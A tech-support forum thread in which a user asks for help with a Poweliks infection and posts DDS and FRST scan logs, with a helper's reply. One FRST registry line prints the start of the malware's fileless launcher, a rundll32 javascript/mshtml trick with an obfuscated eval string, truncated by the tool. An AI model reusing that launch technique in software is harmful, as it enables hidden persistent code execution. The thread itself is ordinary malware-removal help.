Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

dllhost.exe hidden malware/virus


  • Please log in to reply
5 replies to this topic

#1 bcv15

bcv15

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:09:04 PM

Posted 24 September 2014 - 10:47 PM

Hello all,

 

I've been having a particularly nasty infection of some sort.

The topic was started in the Am I infected forum here:

 

http://www.bleepingcomputer.com/forums/t/549287/20-dllhostexe-hogging-resources-in-win-7/sicl

 

Basically, I've been having a problem with dllhost.exe hogging up my cpu and Ram.

This only happens when an internet connection is active. Once they pop up, if I disconnect from the internet,

either Wifi or hardwired, almost all of them disappear.

Using Process Monitor, I found out those dllhost's point to temp files in the users\appdata\local\temp folder.

I've emptied that folder numerous times, but they will return.

I've run malwarebytes, MSE, McAfee Security Plus, Norton Powereraser, MBAR, Rkill, Security Kit, TFC, JRT,

ADWcleaner, Minitool kit, ESET, Windows Repair form Tweaking.com.

Initial scans found some adware/malware and it was removed or quarantined.

 

I've also had problems with popups saying that powershell has stopped working, but I thought it is unrelated.

 

Occasionally, the computer will blue screen also. I have not been able to see the reason as the screen disappears too fast.

At the moment it is acting ok, i'm using Firefox, it seems sometimes that if I start IE, they dllhosts will start.

Update, started IE, and they started again.

 

Here is the DDS scan log:

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.17280  BrowserJavaVersion: 10.67.2
Run by Matts at 22:49:56 on 2014-09-24
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3037.1860 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
SP: Microsoft Security Essentials *Enabled/Updated* {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\STacSV.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\aestsrv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\SearchIndexer.exe
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\IDT\WDM\sttray.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\taskmgr.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\rundll32.exe
C:\Windows\system32\windowspowershell\v1.0\powershell.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\wermgr.exe
C:\Windows\system32\conhost.exe
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com
uWindow Title = Internet Explorer, optimized for Bing and MSN
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - c:\program files\mcafee security scan\3.8.150\McAfeeMSS_IE.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office14\GROOVEEX.DLL
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - c:\program files\java\jre7\bin\ssv.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll
uRun: [DellSystemDetect] c:\users\matts\appdata\local\apps\2.0\w22xg8xy.x98\vyhxe5mw.kww\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRun: [SysTrayApp] c:\program files\idt\wdm\sttray.exe
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\mcafee~1.lnk - c:\program files\mcafee security scan\3.8.150\SSScheduler.exe
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - c:\progra~1\micros~4\office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\micros~4\office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office\office14\ONBttnIELinkedNotes.dll
Trusted Zone: clonewarsadventures.com
Trusted Zone: dell.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{3EE1595F-A5AB-4C82-BB3B-386D7601E741} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{627729EF-1B3F-4C8D-B0A0-A843952F64AA} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{627729EF-1B3F-4C8D-B0A0-A843952F64AA}\F4F4441343 : DHCPNameServer = 192.168.0.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\matts\appdata\roaming\mozilla\firefox\profiles\6m5pp8gy.default\
FF - prefs.js: browser.search.selectedEngine -
FF - plugin: c:\progra~1\micros~4\office14\NPAUTHZ.DLL
FF - plugin: c:\progra~1\micros~4\office14\NPSPWRAP.DLL
FF - plugin: c:\program files\adobe\reader 11.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.30514.0\npctrlui.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1167637.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_15_0_0_152.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2014-7-17 231800]
R2 AESTFilters;Andrea ST Filters Service;c:\windows\system32\driverstore\filerepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\AEstSrv.exe [2014-9-21 81920]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2009-8-18 176128]
R2 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-8-30 95920]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;c:\windows\system32\drivers\AtihdW73.sys [2012-12-26 86544]
R3 k57nd60x;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\k57nd60x.sys [2009-6-7 273448]
R3 netw5v32;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 32 Bit;c:\windows\system32\drivers\netw5v32.sys [2009-6-10 4231168]
R3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2014-8-22 288120]
S1 MpKsl8c5a2e11;MpKsl8c5a2e11;c:\programdata\microsoft\microsoft antimalware\definition updates\{75d41f0a-42e8-498f-ac63-699978ec903e}\MpKsl8c5a2e11.sys [2014-9-24 39464]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-10-23 172192]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2011-4-11 62464]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-9-13 108032]
S3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\mcafee security scan\3.8.150\McCHSvc.exe [2014-4-9 235696]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 20992]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2010-11-20 52224]
S3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2010-11-20 27264]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2012-10-20 1343400]
.
=============== Created Last 30 ================
.
2014-09-24 13:37:09    908840    ----a-w-    c:\programdata\microsoft\microsoft antimalware\definition updates\{33622cc5-6c96-408c-a354-f184372c0810}\gapaengine.dll
2014-09-24 13:36:46    8806800    ----a-w-    c:\programdata\microsoft\microsoft antimalware\definition updates\{75d41f0a-42e8-498f-ac63-699978ec903e}\mpengine.dll
2014-09-24 13:24:47    --------    d-----w-    c:\windows\system32\CatRoot2
2014-09-24 05:48:12    --------    d-----w-    c:\windows\system32\wbem\repository
2014-09-24 03:07:44    --------    d-----w-    c:\windows\system32\wbem\repository.002
2014-09-24 02:59:49    --------    d-----w-    C:\RegBackup
2014-09-24 02:49:21    --------    d-----w-    c:\program files\Tweaking.com
2014-09-24 02:44:42    96680    ----a-w-    c:\windows\system32\WindowsAccessBridge.dll
2014-09-23 03:01:33    --------    d-----w-    c:\program files\ESET
2014-09-23 02:34:28    --------    d-----w-    c:\windows\ERUNT
2014-09-23 01:06:38    8806800    ----a-w-    c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2014-09-22 22:54:50    --------    d-----w-    C:\FRST
2014-09-21 22:52:07    --------    d-----w-    c:\program files\Broadcom
2014-09-21 22:49:50    61440    ----a-w-    c:\windows\system32\aestaren.dll
2014-09-21 22:49:50    511488    ----a-w-    c:\windows\system32\ctapo32.dll
2014-09-21 22:49:50    368640    ----a-w-    c:\windows\system32\aestecap.dll
2014-09-21 22:49:50    142848    ----a-w-    c:\windows\system32\aestacap.dll
2014-09-21 22:49:49    86016    ----a-w-    c:\windows\system32\AESTCom.dll
2014-09-21 22:49:49    536576    ----a-w-    c:\windows\system32\idtmini1.exe
2014-09-21 22:49:49    47104    ----a-w-    c:\windows\system32\ctppld.dll
2014-09-21 22:49:49    3600384    ----a-w-    c:\windows\system32\stlang.dll
2014-09-21 22:49:49    12021852    ----a-w-    c:\windows\system32\idtcpl.cpl
2014-09-21 22:49:48    --------    d-----w-    c:\windows\system32\SRSLabs
2014-09-21 22:48:50    408576    ----a-w-    c:\windows\system32\drivers\stwrt.sys
2014-09-21 22:48:48    914944    ----a-w-    c:\windows\system32\stapo.dll
2014-09-21 22:48:48    405504    ----a-w-    c:\windows\system32\stcplx.dll
2014-09-21 22:48:47    485888    ------w-    c:\windows\system32\stapi32.dll
2014-09-21 22:48:47    175616    ----a-w-    c:\windows\system32\st326217.dll
2014-09-21 22:48:31    --------    d-----w-    c:\program files\IDT
2014-09-21 21:41:31    --------    d-----w-    c:\users\matts\appdata\roaming\Dell
2014-09-21 21:40:10    --------    d-----w-    c:\programdata\PC-Doctor for Windows
2014-09-21 21:40:08    --------    d-----w-    c:\programdata\PCDr
2014-09-21 21:40:06    --------    d-----w-    c:\program files\Dell Support Center
2014-09-21 21:15:06    --------    d-----w-    c:\program files\My Dell
2014-09-21 21:00:13    --------    d-----w-    c:\users\matts\appdata\roaming\PCDr
2014-09-21 21:00:02    --------    d-----w-    C:\temp
2014-09-21 20:56:50    --------    d-----w-    c:\users\matts\appdata\local\Microsoft_Corporation
2014-09-20 19:30:10    --------    d-----w-    C:\AdwCleaner
2014-09-20 12:36:21    --------    d-----w-    c:\users\matts\appdata\local\CrashDumps
2014-09-20 03:38:27    --------    d-----w-    C:\NPE
2014-09-20 03:26:11    --------    d-----w-    c:\users\matts\appdata\local\NPE
2014-09-20 03:26:10    --------    d-----w-    c:\programdata\Norton
2014-09-15 00:35:48    --------    d-----w-    c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-09-14 22:19:29    110296    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-14 22:19:06    75480    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2014-09-14 22:19:06    51928    ----a-w-    c:\windows\system32\drivers\mwac.sys
2014-09-14 22:19:06    --------    d-----w-    c:\program files\Malwarebytes Anti-Malware
2014-09-13 22:34:15    2285056    ----a-w-    c:\windows\system32\msmpeg2vdec.dll
2014-09-12 03:08:29    --------    d-----w-    C:\958f45868474b8ea08185f0d725a
2014-09-11 01:02:55    550912    ----a-w-    c:\windows\system32\kerberos.dll
2014-09-11 01:02:54    1059840    ----a-w-    c:\windows\system32\lsasrv.dll
2014-09-11 01:02:38    1987584    ----a-w-    c:\windows\system32\d3d10warp.dll
2014-09-11 01:02:37    793600    ----a-w-    c:\windows\system32\TSWorkspace.dll
2014-09-02 18:26:04    2352640    ----a-w-    c:\windows\system32\win32k.sys
2014-09-02 18:26:03    305152    ----a-w-    c:\windows\system32\gdi32.dll
2014-08-27 19:08:49    --------    d-sh--w-    c:\users\matts\appdata\local\EmieUserList
2014-08-27 19:08:49    --------    d-sh--w-    c:\users\matts\appdata\local\EmieSiteList
.
==================== Find3M  ====================
.
2014-09-22 06:41:56    231568    ------w-    c:\windows\system32\MpSigStub.exe
2014-09-19 23:18:00    71344    ----a-w-    c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-19 23:18:00    701104    ----a-w-    c:\windows\system32\FlashPlayerApp.exe
2014-08-18 22:08:55    4232704    ----a-w-    c:\windows\system32\jscript9.dll
2014-08-18 21:57:44    2724864    ----a-w-    c:\windows\system32\mshtml.tlb
2014-08-18 21:57:30    4096    ----a-w-    c:\windows\system32\ieetwcollectorres.dll
2014-08-18 21:46:26    454656    ----a-w-    c:\windows\system32\vbscript.dll
2014-08-18 21:45:23    61952    ----a-w-    c:\windows\system32\iesetup.dll
2014-08-18 21:44:44    51200    ----a-w-    c:\windows\system32\ieetwproxystub.dll
2014-08-18 21:44:09    61952    ----a-w-    c:\windows\system32\MshtmlDac.dll
2014-08-18 21:36:07    112128    ----a-w-    c:\windows\system32\ieUnatt.exe
2014-08-18 21:36:05    108032    ----a-w-    c:\windows\system32\ieetwcollector.exe
2014-08-18 21:35:24    597504    ----a-w-    c:\windows\system32\jscript9diag.dll
2014-08-18 21:30:29    646144    ----a-w-    c:\windows\system32\MsSpellCheckingFacility.exe
2014-08-18 21:22:48    60416    ----a-w-    c:\windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 21:08:54    2014208    ----a-w-    c:\windows\system32\inetcpl.cpl
2014-08-18 21:07:44    1068032    ----a-w-    c:\windows\system32\mshtmlmedia.dll
2014-08-18 20:46:48    1812992    ----a-w-    c:\windows\system32\wininet.dll
2014-07-25 06:35:46    875688    ----a-w-    c:\windows\system32\msvcr120_clr0400.dll
2014-07-17 22:05:08    95920    ----a-w-    c:\windows\system32\drivers\NisDrvWFP.sys
2014-07-17 22:05:08    231800    ----a-w-    c:\windows\system32\drivers\MpFilter.sys
2014-07-16 02:46:02    2048    ----a-w-    c:\windows\system32\tzres.dll
2014-07-14 01:42:02    654336    ----a-w-    c:\windows\system32\rpcrt4.dll
2014-07-09 01:29:32    6144    ----a-w-    c:\windows\system32\KBDYAK.DLL
2014-07-09 01:29:31    6144    ----a-w-    c:\windows\system32\KBDBASH.DLL
2014-06-30 22:14:53    8856    ----a-w-    c:\windows\system32\icardres.dll
.
============= FINISH: 22:50:16.94 ===============
 

 

here is the attach Zip

 

Thanks in advance for any insight to this issue.

 

Brian



BC AdBot (Login to Remove)

 


#2 Elise

Elise

    Bleepin' Blonde


  • Malware Study Hall Admin
  • 61,207 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Romania
  • Local time:04:04 AM

Posted 25 September 2014 - 02:26 AM

Hi Brian,
The powershell pop ups are related to the infection (it uses powershell to launch itself). There are a few variants and not all tools do detect this malware, can you please try the following:
  • Please download Farbar Recovery Scan Tool.

    Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Doubleclick on FRST.exe to run it and click Yes at the disclaimer
  • The tool will open.
  • Press Scan button.
  • It will make two logs (FRST.txt and addition.txt) in the same location where you saved frst.exe, please include both logs in your next reply

regards, Elise


"Now faith is the substance of things hoped for, the evidence of things not seen."

 

Follow BleepingComputer on: Facebook | Twitter | Google+ | lockerdome

 

Malware analyst @ Emsisoft


#3 bcv15

bcv15
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Local time:09:04 PM

Posted 25 September 2014 - 09:05 PM

Thank you Elise,

Sorry about taking so long to get back to you. I tried this morning, but have been having issues with this.

Ran the FRST, but it will not generate a addition.txt file. Well it will, but windows can't find it after it does.

At first I though it was because it was in the downloads directory. So I moved FRST to the desktop, still no  addition file.

If I search for it, windows will show a file, but when I try to open it, it says it can't find it.

I found other logs in the C:\FRST\logs, would that be useful?

Computer has blue screened and rebooted a couple of times this morning, then I had to go to work before I could straighten it out.

Something else I have  I have noticed is that MsMpeng.exe, is constantly running, using anywhere from 25-50 CPU cylces

I don't know if it's related. I wasn't sure if I should shut down Windows defender or not.

Anyway. here is the FRST log file

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 25-09-2014
Ran by Matts (administrator) on MATTS-PC on 25-09-2014 10:51:39
Running from C:\Users\Matts\Desktop
Loaded Profile: Matts (Available profiles: Matts)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\stacsv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\AEstSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\WerFault.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Dell) C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-09-05] (Adobe Systems Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [458844 2009-06-29] (IDT, Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...\Run: [DellSystemDetect] => C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe [267328 2014-09-21] (Dell)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com/?ocid=EIE9HP&PC=UP50
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xDC9F3545A5CFCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default
FF SearchEngineOrder.1: Ask Search
FF SelectedSearchEngine: user_pref("browser.search.selectedEngine", "");
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Oovoo Toolbar - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\toolbar_OVO2V7@apn.ask.com.xpi [2013-08-27]
FF Extension: Adblock Plus - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-22]
FF Extension: Hotspot Shield Extension - C:\Program Files\Mozilla Firefox\browser\extensions\afproxy@anchorfree.com [2014-09-24]
FF HKCU\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\STacSV.exe [221266 2009-06-29] (IDT, Inc.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R3 itecir; C:\Windows\System32\DRIVERS\itecir.sys [65640 2010-07-13] (ITE Tech. Inc. )
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
